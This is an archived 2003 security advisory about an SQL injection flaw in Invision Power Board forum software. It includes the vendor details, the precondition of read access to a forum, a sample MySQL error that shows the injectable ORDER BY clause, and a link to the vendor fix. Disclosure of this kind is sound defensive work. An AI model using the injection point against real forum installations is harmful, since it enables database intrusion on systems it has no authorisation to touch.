TUCoPS :: Web BBS :: Frequently Exploited :: hack2584.htm

Invision Power Board SQL Injection Vuln
Invision Power Board SQL Injection Vuln [ All Versions ]

Vendor  : Invision Power Services

URL     : http://www.invisionpower.com 

Version : All Versions Up To v2.0 Alpha 3

Risk    : SQL Injection Vulnerability


Invision Power Board (IPB) is a professional forum system that has been 

built from the ground up with speed and security in mind, taking advantage 

of object oriented code, highly-optimized SQL queries, and the fast PHP 

engine. A comprehensive administration control panel is included to help 

you keep your board running smoothly. Moderators will also enjoy the full 

range of options available to them via built-in tools and moderators control

panel. Members will appreciate the ability to subscribe to topics, send 

private messages, and perform a host of other options through the user 

control panel. It is used by millions of people over the world.


Invision Power Board is vulnerable to an SQL Injection Vulnerability. All

versions up to 2.0 Alpha 3 seem to be affected. Below is an example URL

to test if you are vulnerable.


If you are vulnerable (you should be) you will see an error message similar

to the one posted below. The only requirement is to know a valid forum number

and to have read access to that forum (must be able to view it).

Begin Error Message


mySQL query error: SELECT * from ibf_topics WHERE forum_id=2 and approved=1 

and (last_post > 0 OR pinned=1) ORDER BY pinned DESC, [Problem_is_here] DESC 

LIMIT 0,15

mySQL error: You have an error in your SQL syntax near '[Problem_is_here] 

DESC LIMIT 0,15' at line 1

mySQL error code: 

Date: Saturday 13th of December 2003 01:25:30 AM



Invision Power Services have released a fix for this. You can view the forum post

http://forums.invisionpower.com/index.php?showtopic=106774&st=0&# entry762426

Or go straight to the download page.

http://www.invisionboard.com/download/index.php?act=dl&s=1&id=12 &p=1


Credits go to JeiAr of the GulfTech Security Research Team. 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH